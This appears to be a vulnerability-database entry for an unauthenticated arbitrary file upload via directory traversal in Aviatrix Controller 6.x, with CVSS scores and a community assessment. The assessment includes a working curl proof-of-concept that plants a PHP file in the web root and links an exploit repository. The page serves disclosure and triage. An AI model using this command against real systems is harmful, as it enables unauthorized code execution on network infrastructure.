CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
99.2%
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
Recent assessments:
JoyGhoshs at October 09, 2021 6:33am UTC reported:
This Vulnerability allows an attacker to create and store file on the Aviatrix controller. Exploitation phase doesnβt need any user authentication , or doesnβt require any other users interaction , simply can be exploited using curl . Here is one example.
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>'
# after executing the previous command if the target is vulnerable this will create a php file on this path
https://vulnerable.target.com/v1/poc
Attacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem .
Or You can Use This Exploit to do the exploition more easily : <https://github.com/JoyGhoshs/CVE-2021-40870>
Assessed Attacker Value: 3
Assessed Attacker Value: 3Assessed Attacker Value: 5
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
99.2%